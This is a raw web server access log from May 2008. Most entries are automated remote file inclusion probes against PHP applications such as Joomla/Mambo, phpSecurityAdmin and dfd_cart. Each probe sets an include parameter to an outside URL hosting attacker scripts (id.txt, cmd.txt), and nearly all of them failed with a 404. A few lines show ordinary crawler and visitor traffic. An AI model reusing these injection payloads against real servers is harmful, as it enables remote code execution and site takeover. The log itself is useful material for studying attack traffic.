78.129.197.54 - - [29/May/2008:00:04:41 -0500] "GET /config.inc.php?mosConfig_absolute_path=http://www.mondocitta.net/.htaccess_/id3.txt?? HTTP/1.1" 404 298 "-""libwww-perl/5.805"
216.167.156.20 - - [29/May/2008:00:04:42 -0500] "GET //Neos_Chronos/header.php?base_folder=http://premier.com.tr/edestek/files/index.gif?? HTTP/1.1" 404 308 "-""libwww-perl/5.65"
87.106.101.24 - - [29/May/2008:00:05:29 -0500] "GET /logs//Neos_Chronos/header.php?base_folder=http://www.radiofeniks.net/mg2/pictures/images? HTTP/1.1" 404 313 "-""libwww-perl/5.805"
87.106.101.24 - - [29/May/2008:00:05:29 -0500] "GET //Neos_Chronos/header.php?base_folder=http://www.radiofeniks.net/mg2/pictures/images? HTTP/1.1" 404 308 "-""libwww-perl/5.805"
82.194.82.172 - - [29/May/2008:00:06:24 -0500] "GET //Neos_Chronos/header.php?base_folder=http://barconniere.online.fr/images/borda2.jpg? HTTP/1.1" 404 308 "-""libwww-perl/5.811"
78.129.197.54 - - [29/May/2008:00:10:36 -0500] "GET /logs//config.inc.php?mosConfig_absolute_path=http://www.dito.nl/php_content/.htaccess_/id3.txt?? HTTP/1.1" 404 304 "-""libwww-perl/5.805"
78.129.197.54 - - [29/May/2008:00:10:36 -0500] "GET //config.inc.php?mosConfig_absolute_path=http://www.dito.nl/php_content/.htaccess_/id3.txt?? HTTP/1.1" 404 299 "-""libwww-perl/5.805"
212.227.251.172 - - [29/May/2008:00:11:28 -0500] "GET //Neos_Chronos/header.php?base_folder=http://www.radiofeniks.net/mg2/pictures/images? HTTP/1.1" 404 308 "-""libwww-perl/5.805"
82.194.82.172 - - [29/May/2008:00:13:30 -0500] "GET /logs//Neos_Chronos/header.php?base_folder=http://barconniere.online.fr/images/borda2.jpg? HTTP/1.1" 404 313 "-""libwww-perl/5.811"
205.234.108.195 - - [29/May/2008:00:13:40 -0500] "GET /logs//phpsecurityadmin/include/logout.php?PSA_PATH=http://www.myoutdoortv.com/id.txt?? HTTP/1.1" 404 325 "-""libwww-perl/5.79"
205.234.108.195 - - [29/May/2008:00:13:40 -0500] "GET //phpsecurityadmin/include/logout.php?PSA_PATH=http://www.myoutdoortv.com/id.txt?? HTTP/1.1" 404 320 "-""libwww-perl/5.79"
207.7.108.240 - - [29/May/2008:00:16:26 -0500] "GET //Neos_Chronos/header.php?base_folder=http://www.radiofeniks.net/mg2/pictures/images? HTTP/1.1" 404 308 "-""libwww-perl/5.805"
82.194.82.172 - - [29/May/2008:00:21:25 -0500] "GET /logs//index.php?autoLoadConfig[999][0][autoType]=include&autoLoadConfig[999][0][loadFile]=http://barconniere.online.fr/images/borda2.jpg? HTTP/1.1" 404 299 "-""libwww-perl/5.811"
82.194.82.172 - - [29/May/2008:00:21:25 -0500] "GET //index.php?autoLoadConfig[999][0][autoType]=include&autoLoadConfig[999][0][loadFile]=http://barconniere.online.fr/images/borda2.jpg? HTTP/1.1" 404 294 "-""libwww-perl/5.811"
80.231.171.70 - - [29/May/2008:00:21:31 -0500] "GET /logs//phpsecurityadmin/include/logout.php?PSA_PATH=http://www.cdvmbienesraices.com.mx/images/html_f2.jpg?? HTTP/1.1" 404 325 "-""libwww-perl/5.803"
80.231.171.70 - - [29/May/2008:00:21:32 -0500] "GET //phpsecurityadmin/include/logout.php?PSA_PATH=http://www.cdvmbienesraices.com.mx/images/html_f2.jpg?? HTTP/1.1" 404 320 "-""libwww-perl/5.803"
216.188.60.54 - - [29/May/2008:00:21:56 -0500] "GET /logs//Neos_Chronos/header.php?base_folder=http://www.radiofeniks.net/mg2/pictures/images? HTTP/1.1" 404 313 "-""libwww-perl/5.805"
216.188.60.54 - - [29/May/2008:00:21:56 -0500] "GET //Neos_Chronos/header.php?base_folder=http://www.radiofeniks.net/mg2/pictures/images? HTTP/1.1" 404 308 "-""libwww-perl/5.805"
78.82.245.21 - - [29/May/2008:00:24:33 -0500] "GET /logs//phpsecurityadmin/include/logout.php?PSA_PATH=http://rpgnet.com/newrpgnet/intranet/cmd.txt???? HTTP/1.1" 404 325 "-""libwww-perl/5.805"
78.82.245.21 - - [29/May/2008:00:24:34 -0500] "GET //phpsecurityadmin/include/logout.php?PSA_PATH=http://rpgnet.com/newrpgnet/intranet/cmd.txt???? HTTP/1.1" 404 320 "-""libwww-perl/5.805"
200.30.73.117 - - [29/May/2008:00:26:04 -0500] "GET //include/bbs.lib.inc.php?site_pathhttp://www.geocities.com/koeluna/response.txt??? HTTP/1.1" 404 308 "-""Mozilla/5.0 (Windows; U; Windows NT 5.1; nl-NL; rv:1.7.5) Gecko/20041202 Firefox/1.0"
200.30.73.117 - - [29/May/2008:00:26:06 -0500] "GET /logs//include/bbs.lib.inc.php?site_pathhttp://www.geocities.com/koeluna/response.txt??? HTTP/1.1" 404 313 "-""Mozilla/5.0 (Windows; U; Windows NT 5.1; nl-NL; rv:1.7.5) Gecko/20041202 Firefox/1.0"
99.175.236.97 - - [29/May/2008:00:27:29 -0500] "GET /logs/dfd_cart/app.lib/product.control/core.php/customer.area/customer.browse.list.php?set_depth=http://poko.as.ro/s/id3.txt?? HTTP/1.1" 404 369 "-""libwww-perl/5.805"
99.175.236.97 - - [29/May/2008:00:27:29 -0500] "GET /dfd_cart/app.lib/product.control/core.php/customer.area/customer.browse.list.php?set_depth=http://poko.as.ro/s/id3.txt?? HTTP/1.1" 404 364 "-""libwww-perl/5.805"
99.175.236.97 - - [29/May/2008:00:27:38 -0500] "GET /logs/dfd_cart/app.lib/product.control/core.php/customer.area/customer.browse.search.php?set_depth=http://poko.as.ro/s/id3.txt?? HTTP/1.1" 404 371 "-""libwww-perl/5.805"
99.175.236.97 - - [29/May/2008:00:27:39 -0500] "GET /dfd_cart/app.lib/product.control/core.php/customer.area/customer.browse.search.php?set_depth=http://poko.as.ro/s/id3.txt?? HTTP/1.1" 404 366 "-""libwww-perl/5.805"
85.21.96.188 - - [29/May/2008:00:27:40 -0500] "GET /logs/dfd_cart/app.lib/product.control/core.php/product.control.config.php?set_depth=http://wiki.agorian.com/tiki/img/wiki/id.txt?? HTTP/1.1" 404 357 "-""libwww-perl/5.812"
85.21.96.188 - - [29/May/2008:00:27:40 -0500] "GET /dfd_cart/app.lib/product.control/core.php/product.control.config.php?set_depth=http://wiki.agorian.com/tiki/img/wiki/id.txt?? HTTP/1.1" 404 352 "-""libwww-perl/5.812"
216.167.156.20 - - [29/May/2008:00:27:59 -0500] "GET /logs/access_log.1204761600//Neos_Chronos/header.php?base_folder=http://premier.com.tr/edestek/files/index.gif?? HTTP/1.1" 404 335 "-""libwww-perl/5.65"
216.167.156.20 - - [29/May/2008:00:27:59 -0500] "GET //Neos_Chronos/header.php?base_folder=http://premier.com.tr/edestek/files/index.gif?? HTTP/1.1" 404 308 "-""libwww-perl/5.65"
216.167.156.20 - - [29/May/2008:00:27:59 -0500] "GET /logs//Neos_Chronos/header.php?base_folder=http://premier.com.tr/edestek/files/index.gif?? HTTP/1.1" 404 313 "-""libwww-perl/5.65"
216.167.156.20 - - [29/May/2008:00:28:00 -0500] "GET /logs/access_log.1207785600//Neos_Chronos/header.php?base_folder=http://premier.com.tr/edestek/files/index.gif?? HTTP/1.1" 404 335 "-""libwww-perl/5.65"
211.20.85.150 - - [29/May/2008:00:28:27 -0500] "GET /robots.txt HTTP/1.1" 404 294 "-""Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 1.1.4322; MSIECrawler)"
67.212.173.42 - - [29/May/2008:00:28:52 -0500] "GET /logs/dfd_cart/app.lib/product.control/core.php/customer.area/customer.browse.list.php?set_depth=http://kiliclub.com/tmp/nid.txt? HTTP/1.1" 404 369 "-""libwww-perl/5.811"
67.212.173.42 - - [29/May/2008:00:28:52 -0500] "GET /dfd_cart/app.lib/product.control/core.php/customer.area/customer.browse.list.php?set_depth=http://kiliclub.com/tmp/nid.txt? HTTP/1.1" 404 364 "-""libwww-perl/5.811"
80.237.209.104 - - [29/May/2008:00:29:47 -0500] "GET /logs/errors.php?error=http://arai.web.id/jek/bot/dodol.txt?? HTTP/1.1" 404 299 "-""libwww-perl/5.803"
80.237.209.104 - - [29/May/2008:00:29:47 -0500] "GET /errors.php?error=http://arai.web.id/jek/bot/dodol.txt?? HTTP/1.1" 404 294 "-""libwww-perl/5.803"
64.180.134.223 - - [29/May/2008:00:29:59 -0500] "GET /logs//modules/agendax/addevent.inc.php?agendax_path=http://yogyafree.net/rapat5.jpg?? HTTP/1.1" 404 322 "-""libwww-perl/5.65"
64.180.134.223 - - [29/May/2008:00:30:02 -0500] "GET //modules/agendax/addevent.inc.php?agendax_path=http://yogyafree.net/rapat5.jpg?? HTTP/1.1" 404 317 "-""libwww-perl/5.65"
209.164.178.178 - - [29/May/2008:00:32:17 -0500] "GET /logs/access_log.1207785600//components/com_joomlalib/standalone/stubjambo.php?baseDir=http://bigme.com.au//components/com_joomlalib/standalone/idpit.txt?? HTTP/1.1" 404 361 "-""libwww-perl/5.79"
209.164.178.178 - - [29/May/2008:00:32:17 -0500] "GET /logs//components/com_joomlalib/standalone/stubjambo.php?baseDir=http://bigme.com.au//components/com_joomlalib/standalone/idpit.txt?? HTTP/1.1" 404 339 "-""libwww-perl/5.79"
209.164.178.178 - - [29/May/2008:00:32:29 -0500] "GET /logs/access_log.1204761600//components/com_joomlalib/standalone/stubjambo.php?baseDir=http://bigme.com.au//components/com_joomlalib/standalone/idpit.txt?? HTTP/1.1" 404 361 "-""libwww-perl/5.79"
69.72.208.186 - - [29/May/2008:00:33:54 -0500] "GET /index.php?mosConfig_absolute_path=http://bigme.com.au//components/com_joomlalib/standalone/baram.txt?? HTTP/1.1" 404 293 "-""libwww-perl/5.805"
83.244.130.90 - - [29/May/2008:00:36:20 -0500] "GET /logs//modules/mod_mainmenu.php?mosConfig_absolute_path=http://methamphetamine.name/testar.txt?? HTTP/1.1" 404 314 "-""libwww-perl/5.79"
83.244.130.90 - - [29/May/2008:00:36:21 -0500] "GET //modules/mod_mainmenu.php?mosConfig_absolute_path=http://methamphetamine.name/testar.txt?? HTTP/1.1" 404 309 "-""libwww-perl/5.79"
216.193.201.57 - - [29/May/2008:00:38:25 -0500] "GET /logs//index.php?option=com_mambots&Itemid=&mosConfig_absolute_path=http://www.geocities.com/refusedlink/cmd.txt? HTTP/1.1" 404 299 "-""libwww-perl/5.75"
216.193.201.57 - - [29/May/2008:00:38:25 -0500] "GET //index.php?option=com_mambots&Itemid=&mosConfig_absolute_path=http://www.geocities.com/refusedlink/cmd.txt? HTTP/1.1" 404 294 "-""libwww-perl/5.75"
201.236.111.227 - - [29/May/2008:00:38:32 -0500] "GET /logs//Neos_Chronos/header.php?base_folder=http://municoinco.cl/web2/includes/Archive/test.txt? HTTP/1.1" 404 313 "-""Mozilla/4.61 [en] (OS/2; U)"
201.236.111.227 - - [29/May/2008:00:38:32 -0500] "GET //Neos_Chronos/header.php?base_folder=http://municoinco.cl/web2/includes/Archive/test.txt? HTTP/1.1" 404 308 "-""Mozilla/4.61 [en] (OS/2; U)"
80.56.238.73 - - [29/May/2008:00:38:36 -0500] "GET / HTTP/1.1" 200 1243 "-""Java/1.6.0_05"
212.97.132.101 - - [29/May/2008:00:39:03 -0500] "GET /logs//modules/mod_mainmenu.php?mosConfig_absolute_path=http://members.lycos.co.uk/fuker00/id.txt?? HTTP/1.0" 404 302 "-""libwww-perl/5.53"
212.97.132.101 - - [29/May/2008:00:39:03 -0500] "GET //modules/mod_mainmenu.php?mosConfig_absolute_path=http://members.lycos.co.uk/fuker00/id.txt?? HTTP/1.0" 404 297 "-""libwww-perl/5.53"
212.97.132.101 - - [29/May/2008:00:39:25 -0500] "GET /logs//modules/mod_mainmenu.php?mosConfig_absolute_path=http://members.lycos.co.uk/fuker00/id.txt?? HTTP/1.0" 404 302 "-""libwww-perl/5.53"
212.97.132.101 - - [29/May/2008:00:39:25 -0500] "GET //modules/mod_mainmenu.php?mosConfig_absolute_path=http://members.lycos.co.uk/fuker00/id.txt?? HTTP/1.0" 404 297 "-""libwww-perl/5.53"
217.160.203.190 - - [29/May/2008:00:40:12 -0500] "GET /logs/access_log.1207008000//Neos_Chronos/header.php?base_folder=http://medisana.co.kr/test?? HTTP/1.1" 404 335 "-""libwww-perl/5.805"
195.54.9.218 - - [29/May/2008:00:41:06 -0500] "GET /logs//Neos_Chronos/header.php?base_folder=http://kiliclub.com/tmp/mid.txt? HTTP/1.1" 404 313 "-""libwww-perl/5.803"
195.54.9.218 - - [29/May/2008:00:41:06 -0500] "GET //Neos_Chronos/header.php?base_folder=http://kiliclub.com/tmp/mid.txt? HTTP/1.1" 404 308 "-""libwww-perl/5.803"
67.212.173.42 - - [29/May/2008:00:42:51 -0500] "GET /logs//modules/mod_mainmenu.php?mosConfig_absolute_path=http://kiliclub.com/tmp/nid.txt? HTTP/1.1" 404 314 "-""libwww-perl/5.811"
67.212.173.42 - - [29/May/2008:00:42:51 -0500] "GET //modules/mod_mainmenu.php?mosConfig_absolute_path=http://kiliclub.com/tmp/nid.txt? HTTP/1.1" 404 309 "-""libwww-perl/5.811"
67.212.173.42 - - [29/May/2008:00:42:53 -0500] "GET /logs//modules/mod_mainmenu.php?mosConfig_absolute_path=http://kiliclub.com/tmp/nid.txt? HTTP/1.1" 404 314 "-""libwww-perl/5.811"
67.212.173.42 - - [29/May/2008:00:42:53 -0500] "GET //modules/mod_mainmenu.php?mosConfig_absolute_path=http://kiliclub.com/tmp/nid.txt? HTTP/1.1" 404 309 "-""libwww-perl/5.811"
217.198.149.178 - - [29/May/2008:00:43:41 -0500] "GET /logs/index.php?option=com_mambowiki&Itemid=&mosConfig_absolute_path=http://whatswhere.org/img/wiki/id.txt?? HTTP/1.1" 404 298 "-""libwww-perl/5.810"
217.198.149.178 - - [29/May/2008:00:43:41 -0500] "GET /index.php?option=com_mambowiki&Itemid=&mosConfig_absolute_path=http://whatswhere.org/img/wiki/id.txt?? HTTP/1.1" 404 293 "-""libwww-perl/5.810"
65.55.208.120 - - [29/May/2008:00:44:46 -0500] "GET /logs/access_log.1170201600 HTTP/1.1" 304 - "-""msnbot/1.1 (+http://search.msn.com/msnbot.htm)"
80.231.171.70 - - [29/May/2008:00:47:17 -0500] "GET /logs//modules/mod_mainmenu.php?mosConfig_absolute_path=http://www.cdvmbienesraices.com.mx/images/html_f2.jpg?? HTTP/1.1" 404 314 "-""libwww-perl/5.803"
80.231.171.70 - - [29/May/2008:00:47:17 -0500] "GET //modules/mod_mainmenu.php?mosConfig_absolute_path=http://www.cdvmbienesraices.com.mx/images/html_f2.jpg?? HTTP/1.1" 404 309 "-""libwww-perl/5.803"
209.163.169.99 - - [29/May/2008:00:48:29 -0500] "GET /logs//modules/mod_mainmenu.php?mosConfig_absolute_path=http://kiliclub.com/tmp/nid.txt? HTTP/1.1" 404 314 "-""libwww-perl/5.810"
209.163.169.99 - - [29/May/2008:00:48:30 -0500] "GET //modules/mod_mainmenu.php?mosConfig_absolute_path=http://kiliclub.com/tmp/nid.txt? HTTP/1.1" 404 309 "-""libwww-perl/5.810"
217.160.203.190 - - [29/May/2008:00:48:30 -0500] "GET /logs/access_log.1207008000//Neos_Chronos/header.php?base_folder=http://medisana.co.kr/test? HTTP/1.1" 404 335 "-""libwww-perl/5.805"
67.205.96.205 - - [29/May/2008:00:49:03 -0500] "GET /logs/index.php?option=com_mambowiki&Itemid=&mosConfig_absolute_path=http://www.mcpanic.com/tikiwiki/img/wiki/id.txt?? HTTP/1.1" 404 298 "-""libwww-perl/5.812"
67.205.96.205 - - [29/May/2008:00:49:04 -0500] "GET /index.php?option=com_mambowiki&Itemid=&mosConfig_absolute_path=http://www.mcpanic.com/tikiwiki/img/wiki/id.txt?? HTTP/1.1" 404 293 "-""libwww-perl/5.812"
209.163.169.99 - - [29/May/2008:00:49:08 -0500] "GET /logs//modules/mod_mainmenu.php?mosConfig_absolute_path=http://kiliclub.com/tmp/nid.txt? HTTP/1.1" 404 314 "-""libwww-perl/5.810"
209.163.169.99 - - [29/May/2008:00:49:08 -0500] "GET //modules/mod_mainmenu.php?mosConfig_absolute_path=http://kiliclub.com/tmp/nid.txt? HTTP/1.1" 404 309 "-""libwww-perl/5.810"
195.12.53.176 - - [29/May/2008:00:53:21 -0500] "GET /logs//Neos_Chronos/header.php?base_folder=http://www.geocities.com/mahesaputra53/kiss.txt?? HTTP/1.1" 404 313 "-""libwww-perl/5.805"
195.12.53.176 - - [29/May/2008:00:53:21 -0500] "GET //Neos_Chronos/header.php?base_folder=http://www.geocities.com/mahesaputra53/kiss.txt?? HTTP/1.1" 404 308 "-""libwww-perl/5.805"
203.129.60.222 - - [29/May/2008:00:53:43 -0500] "GET /costume/index1.htm HTTP/1.1" 200 21563 "http://www.google.com/search?hl=en&rls=com.microsoft:*:IE-Address&rlz=1I7GZHY&pwst=1&q=frankish+women+costumes&start=20&sa=N""Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0; SLCC1; .NET CLR 2.0.50727; Media Center PC 5.0; .NET CLR 3.0.04506)"
203.129.60.222 - - [29/May/2008:00:53:45 -0500] "GET /favicon.ico HTTP/1.1" 404 295 "-""Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0; SLCC1; .NET CLR 2.0.50727; Media Center PC 5.0; .NET CLR 3.0.04506)"
203.129.60.222 - - [29/May/2008:00:54:09 -0500] "GET /costume/thmb3.htm HTTP/1.1" 200 2922 "http://tomdolan.pconline.com/costume/index1.htm""Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0; SLCC1; .NET CLR 2.0.50727; Media Center PC 5.0; .NET CLR 3.0.04506)"
203.129.60.222 - - [29/May/2008:00:54:09 -0500] "GET /costume/costm25.jpg HTTP/1.1" 200 9810 "http://tomdolan.pconline.com/costume/thmb3.htm""Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0; SLCC1; .NET CLR 2.0.50727; Media Center PC 5.0; .NET CLR 3.0.04506)"
203.129.60.222 - - [29/May/2008:00:54:10 -0500] "GET /costume/costm26.jpg HTTP/1.1" 200 9402 "http://tomdolan.pconline.com/costume/thmb3.htm""Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0; SLCC1; .NET CLR 2.0.50727; Media Center PC 5.0; .NET CLR 3.0.04506)"
203.129.60.222 - - [29/May/2008:00:54:10 -0500] "GET /costume/costm27.jpg HTTP/1.1" 200 9516 "http://tomdolan.pconline.com/costume/thmb3.htm""Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0; SLCC1; .NET CLR 2.0.50727; Media Center PC 5.0; .NET CLR 3.0.04506)"
203.129.60.222 - - [29/May/2008:00:54:10 -0500] "GET /costume/costm28.jpg HTTP/1.1" 200 10658 "http://tomdolan.pconline.com/costume/thmb3.htm""Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0; SLCC1; .NET CLR 2.0.50727; Media Center PC 5.0; .NET CLR 3.0.04506)"
203.129.60.222 - - [29/May/2008:00:54:11 -0500] "GET /costume/costm29.jpg HTTP/1.1" 200 9835 "http://tomdolan.pconline.com/costume/thmb3.htm""Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0; SLCC1; .NET CLR 2.0.50727; Media Center PC 5.0; .NET CLR 3.0.04506)"
203.129.60.222 - - [29/May/2008:00:54:11 -0500] "GET /costume/costm31.jpg HTTP/1.1" 200 9395 "http://tomdolan.pconline.com/costume/thmb3.htm""Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0; SLCC1; .NET CLR 2.0.50727; Media Center PC 5.0; .NET CLR 3.0.04506)"
203.129.60.222 - - [29/May/2008:00:54:11 -0500] "GET /costume/costm32.jpg HTTP/1.1" 200 9839 "http://tomdolan.pconline.com/costume/thmb3.htm""Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0; SLCC1; .NET CLR 2.0.50727; Media Center PC 5.0; .NET CLR 3.0.04506)"
203.129.60.222 - - [29/May/2008:00:54:12 -0500] "GET /costume/costm33.jpg HTTP/1.1" 200 9703 "http://tomdolan.pconline.com/costume/thmb3.htm""Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0; SLCC1; .NET CLR 2.0.50727; Media Center PC 5.0; .NET CLR 3.0.04506)"
203.129.60.222 - - [29/May/2008:00:54:12 -0500] "GET /costume/costm30.jpg HTTP/1.1" 200 59433 "http://tomdolan.pconline.com/costume/thmb3.htm""Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0; SLCC1; .NET CLR 2.0.50727; Media Center PC 5.0; .NET CLR 3.0.04506)"
203.129.60.222 - - [29/May/2008:00:54:12 -0500] "GET /costume/costm34.jpg HTTP/1.1" 200 9637 "http://tomdolan.pconline.com/costume/thmb3.htm""Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0; SLCC1; .NET CLR 2.0.50727; Media Center PC 5.0; .NET CLR 3.0.04506)"
203.129.60.222 - - [29/May/2008:00:54:12 -0500] "GET /costume/costm35.jpg HTTP/1.1" 200 10912 "http://tomdolan.pconline.com/costume/thmb3.htm""Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0; SLCC1; .NET CLR 2.0.50727; Media Center PC 5.0; .NET CLR 3.0.04506)"
203.129.60.222 - - [29/May/2008:00:54:12 -0500] "GET /costume/costm36.jpg HTTP/1.1" 200 9631 "http://tomdolan.pconline.com/costume/thmb3.htm""Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0; SLCC1; .NET CLR 2.0.50727; Media Center PC 5.0; .NET CLR 3.0.04506)"
203.129.60.222 - - [29/May/2008:00:55:17 -0500] "GET /costume/costume2.htm HTTP/1.1" 200 1810 "http://tomdolan.pconline.com/costume/thmb3.htm""Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0; SLCC1; .NET CLR 2.0.50727; Media Center PC 5.0; .NET CLR 3.0.04506)"
201.236.111.227 - - [29/May/2008:00:56:41 -0500] "GET //Neos_Chronos/header.php?base_folder=http://municoinco.cl/web2/includes/Archive/test.txt? HTTP/1.1" 404 308 "-""Mozilla/4.61 [en] (OS/2; U)"
201.236.111.227 - - [29/May/2008:00:56:41 -0500] "GET /logs//Neos_Chronos/header.php?base_folder=http://municoinco.cl/web2/includes/Archive/test.txt? HTTP/1.1" 404 313 "-""Mozilla/4.61 [en] (OS/2; U)"
69.72.208.186 - - [29/May/2008:01:00:48 -0500] "GET /logs/access_log.1207785600/index.php?mosConfig_absolute_path=http://bigme.com.au//components/com_joomlalib/standalone/baram.txt?? HTTP/1.1" 404 320 "-""libwww-perl/5.805"
69.72.208.186 - - [29/May/2008:01:00:48 -0500] "GET /index.php?mosConfig_absolute_path=http://bigme.com.au//components/com_joomlalib/standalone/baram.txt?? HTTP/1.1" 404 293 "-""libwww-perl/5.805"
69.72.208.186 - - [29/May/2008:01:00:48 -0500] "GET /logs/index.php?mosConfig_absolute_path=http://bigme.com.au//components/com_joomlalib/standalone/baram.txt?? HTTP/1.1" 404 298 "-""libwww-perl/5.805"
69.72.208.186 - - [29/May/2008:01:00:51 -0500] "GET /logs/access_log.1204761600/index.php?mosConfig_absolute_path=http://bigme.com.au//components/com_joomlalib/standalone/baram.txt?? HTTP/1.1" 404 320 "-""libwww-perl/5.805"
70.86.26.122 - - [29/May/2008:01:07:26 -0500] "GET /logs//modules/agendax/addevent.inc.php?agendax_path=http://www.english-irish-setter.at/webnews/.../id2.txt?? HTTP/1.1" 404 322 "-""libwww-perl/5.79"
70.86.26.122 - - [29/May/2008:01:07:26 -0500] "GET //modules/agendax/addevent.inc.php?agendax_path=http://www.english-irish-setter.at/webnews/.../id2.txt?? HTTP/1.1" 404 317 "-""libwww-perl/5.79"
65.55.208.133 - - [29/May/2008:01:22:42 -0500] "GET /logs/access_log.1188172800 HTTP/1.1" 304 - "-""msnbot/1.1 (+http://search.msn.com/msnbot.htm)"
74.6.18.33 - - [29/May/2008:01:28:11 -0500] "GET /robots.txt HTTP/1.0" 404 282 "-""Mozilla/5.0 (compatible; Yahoo! Slurp; http://help.yahoo.com/help/us/ysearch/slurp)"
74.6.31.189 - - [29/May/2008:01:28:11 -0500] "GET / HTTP/1.0" 200 1231 "-""Mozilla/5.0 (compatible; Yahoo! DE Slurp; http://help.yahoo.com/help/us/ysearch/slurp)"
195.12.53.176 - - [29/May/2008:01:32:51 -0500] "GET /logs//index.php?autoLoadConfig[999][0][autoType]=include&autoLoadConfig[999][0][loadFile]=http://www.geocities.com/mahesaputra53/kiss.txt?? HTTP/1.1" 404 299 "-""libwww-perl/5.805"
195.12.53.176 - - [29/May/2008:01:32:51 -0500] "GET //index.php?autoLoadConfig[999][0][autoType]=include&autoLoadConfig[999][0][loadFile]=http://www.geocities.com/mahesaputra53/kiss.txt?? HTTP/1.1" 404 294 "-""libwww-perl/5.805"
195.54.9.218 - - [29/May/2008:01:38:19 -0500] "GET /logs//Neos_Chronos/header.php?base_folder=http://singspiration.org/cmd.txt? HTTP/1.1" 404 313 "-""libwww-perl/5.803"
195.54.9.218 - - [29/May/2008:01:38:19 -0500] "GET //Neos_Chronos/header.php?base_folder=http://singspiration.org/cmd.txt? HTTP/1.1" 404 308 "-""libwww-perl/5.803"
67.15.205.17 - - [29/May/2008:01:42:27 -0500] "GET /logs//index.php?option=com_jreactions&Itemid=&mosConfig_absolute_path=http://eiea-sy.com/id.txt??? HTTP/1.1" 404 299 "-""libwww-perl/5.811"
67.15.205.17 - - [29/May/2008:01:42:27 -0500] "GET //index.php?option=com_jreactions&Itemid=&mosConfig_absolute_path=http://eiea-sy.com/id.txt??? HTTP/1.1" 404 294 "-""libwww-perl/5.811"
72.249.108.180 - - [29/May/2008:01:46:08 -0500] "GET /logs//components/com_simpleboard/image_upload.php?sbp=http://www.aquaclubdesign.gr/classes/phpmailer/id.txt? HTTP/1.1" 404 333 "-""libwww-perl/5.810"
72.249.108.180 - - [29/May/2008:01:46:08 -0500] "GET //components/com_simpleboard/image_upload.php?sbp=http://www.aquaclubdesign.gr/classes/phpmailer/id.txt? HTTP/1.1" 404 328 "-""libwww-perl/5.810"
195.12.53.176 - - [29/May/2008:01:49:14 -0500] "GET /dfd_cart/app.lib/product.control/core.php/customer.area/customer.browse.list.php?set_depth=http://h1.ripway.com/inkamarsya/test.txt??? HTTP/1.1" 404 364 "-""Mozilla/5.0 (Windows; U; Windows NT 6.0; en-US; rv:1.8.0.1) Gecko/20060111 Firefox/1.5.0.1"
67.15.205.17 - - [29/May/2008:01:51:01 -0500] "GET /logs//index.php?option=com_mambots&Itemid=&mosConfig_absolute_path=http://eiea-sy.com/id.txt??? HTTP/1.1" 404 299 "-""libwww-perl/5.811"
67.15.205.17 - - [29/May/2008:01:51:01 -0500] "GET //index.php?option=com_mambots&Itemid=&mosConfig_absolute_path=http://eiea-sy.com/id.txt??? HTTP/1.1" 404 294 "-""libwww-perl/5.811"
195.12.53.176 - - [29/May/2008:01:51:55 -0500] "GET /dfd_cart/app.lib/product.control/core.php/customer.area/customer.browse.list.php?set_depth=http://www.geocities.com/cahayaindra/test.txt??? HTTP/1.1" 404 364 "-""Mozilla/4.0 (compatible; MSIE 7.0b; Windows NT 6.0)"
83.244.130.90 - - [29/May/2008:01:54:10 -0500] "GET /logs/dfd_cart/app.lib/product.control/core.php/customer.area/customer.browse.list.php?set_depth=http://methamphetamine.name/testar.txt?? HTTP/1.1" 404 369 "-""libwww-perl/5.79"
83.244.130.90 - - [29/May/2008:01:54:11 -0500] "GET /dfd_cart/app.lib/product.control/core.php/customer.area/customer.browse.list.php?set_depth=http://methamphetamine.name/testar.txt?? HTTP/1.1" 404 364 "-""libwww-perl/5.79"
207.7.108.240 - - [29/May/2008:01:54:29 -0500] "GET /logs/dfd_cart/app.lib/product.control/core.php/customer.area/customer.browse.list.php?set_depth=http://www.radiofeniks.net/mg2/pictures/images? HTTP/1.1" 404 369 "-""libwww-perl/5.805"
207.7.108.240 - - [29/May/2008:01:54:29 -0500] "GET /dfd_cart/app.lib/product.control/core.php/customer.area/customer.browse.list.php?set_depth=http://www.radiofeniks.net/mg2/pictures/images? HTTP/1.1" 404 364 "-""libwww-perl/5.805"
67.15.205.17 - - [29/May/2008:01:55:06 -0500] "GET /logs//index.php?option=com_dbquery&Itemid=&mosConfig_absolute_path=http://eiea-sy.com/id.txt??? HTTP/1.1" 404 299 "-""libwww-perl/5.811"
67.15.205.17 - - [29/May/2008:01:55:07 -0500] "GET //index.php?option=com_dbquery&Itemid=&mosConfig_absolute_path=http://eiea-sy.com/id.txt??? HTTP/1.1" 404 294 "-""libwww-perl/5.811"
